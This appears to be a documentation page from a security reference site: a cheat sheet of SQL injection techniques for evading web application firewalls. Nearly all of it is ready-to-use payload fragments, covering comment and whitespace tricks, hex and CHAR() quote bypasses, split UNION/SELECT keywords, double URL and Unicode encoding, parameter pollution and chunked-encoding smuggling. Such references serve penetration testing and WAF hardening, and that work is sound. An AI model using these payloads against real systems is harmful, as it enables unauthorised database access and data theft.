> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# WAF Bypass

> SQL injection WAF bypass techniques: encoding, comments, alternative syntax, and filter evasion.

## Space Bypass

```
/**/                    →  SELECT/**/username/**/FROM/**/users
+                       →  SELECT+username+FROM+users
%20                     →  SELECT%20username%20FROM%20users
%09 (tab)               →  SELECT%09username%09FROM%09users
%0a (newline)           →  SELECT%0ausername%0aFROM%0ausers
%0d                     →  carriage return
()                      →  SELECT(username)FROM(users)
```

***

## Comment Variations

```sql theme={"dark"}
-- comment
--+ comment
# comment
/*comment*/
/*!50000 SELECT*/ 1     -- MySQL version-specific comment
;%00                    -- Null byte
```

***

## Case Manipulation

```sql theme={"dark"}
SeLeCt username FrOm users
sElEcT uSeRnAmE fRoM uSeRs
```

***

## Quote Bypass

### No Quotes — Hex

```sql theme={"dark"}
SELECT * FROM users WHERE username=0x61646d696e     -- 'admin' in hex
```

### No Quotes — CHAR()

```sql theme={"dark"}
SELECT * FROM users WHERE username=CHAR(97,100,109,105,110)
```

### Double Quotes

```sql theme={"dark"}
SELECT * FROM users WHERE username="admin"
```

***

## Keyword Bypass

### UNION Blocked

```sql theme={"dark"}
UN/**/ION SE/**/LECT
UNiOn SeLeCt
UNION ALL SELECT
UNION%0aSELECT
/*!UNION*/ /*!SELECT*/
```

### SELECT Blocked

```sql theme={"dark"}
SE/**/LECT
SeLeCt
%53%45%4c%45%43%54          -- URL-encoded
```

### OR / AND Blocked

```sql theme={"dark"}
|| instead of OR
&& instead of AND
```

### Comma Blocked

```sql theme={"dark"}
-- UNION SELECT without commas
UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c

-- SUBSTRING without comma
SUBSTRING(database() FROM 1 FOR 1)

-- LIMIT without comma
LIMIT 1 OFFSET 0
```

### Equals Blocked

```sql theme={"dark"}
LIKE instead of =
IN (value) instead of =value
BETWEEN value AND value
REGEXP 'pattern'
```

***

## Encoding

### URL Encoding

```
' → %27
= → %3d
  → %20
# → %23
/ → %2f
```

### Double URL Encoding

```
' → %2527
  → %2520
```

### Unicode

```
' → %u0027
< → %u003c
```

### Hex Encoding

```sql theme={"dark"}
0x61646d696e = 'admin'
SELECT * FROM users WHERE name=0x61646d696e
```

***

## String Concatenation

### MySQL

```sql theme={"dark"}
CONCAT('ad','min')
'ad' 'min'              -- Adjacent strings auto-concat
```

### MSSQL

```sql theme={"dark"}
'ad'+'min'
```

### PostgreSQL

```sql theme={"dark"}
'ad'||'min'
```

### Oracle

```sql theme={"dark"}
'ad'||'min'
```

***

## Alternative Functions

| Blocked              | Alternative                              |
| -------------------- | ---------------------------------------- |
| `SUBSTRING`          | `MID()`, `SUBSTR()`, `LEFT()`, `RIGHT()` |
| `ASCII`              | `ORD()`, `HEX()`                         |
| `SLEEP`              | `BENCHMARK(10000000,SHA1('x'))`          |
| `IF`                 | `CASE WHEN ... THEN ... END`             |
| `GROUP_CONCAT`       | `CONCAT_WS()`, subquery with `LIMIT`     |
| `information_schema` | `mysql.innodb_table_stats` (MySQL 5.6+)  |

***

## HTTP Parameter Pollution

```
?id=1&id=UNION&id=SELECT&id=1,2,3
```

Some WAFs only check first/last parameter.

***

## Chunked Transfer Encoding

```http theme={"dark"}
Transfer-Encoding: chunked

3
id=
5
1 UNI
7
ON SELE
5
CT 1
0
```

***

## JSON / XML Injection

### JSON Body

```json theme={"dark"}
{"id": "1 UNION SELECT 1,2,3-- -"}
```

### XML Body

```xml theme={"dark"}
<id>1 UNION SELECT 1,2,3-- -</id>
```

Some WAFs don't inspect non-standard content types.

***

## Quick Reference

| Filter   | Bypass                                     |
| -------- | ------------------------------------------ |
| Spaces   | `/**/`, `+`, `%09`, `%0a`                  |
| UNION    | `UN/**/ION`, `UNiOn`, `/*!UNION*/`         |
| Quotes   | `0x hex`, `CHAR()`, double quotes          |
| Commas   | `JOIN`, `FROM x FOR y`, `LIMIT 1 OFFSET 0` |
| Equals   | `LIKE`, `IN()`, `BETWEEN`, `REGEXP`        |
| Encoding | Double URL, Unicode, Hex                   |

***

## Sources

* [OWASP — SQL Injection Bypassing WAF](https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF)
* [PortSwigger — SQL Injection Cheat Sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)
* [SQLmap — Tamper Scripts](https://github.com/sqlmapproject/sqlmap/tree/master/tamper)
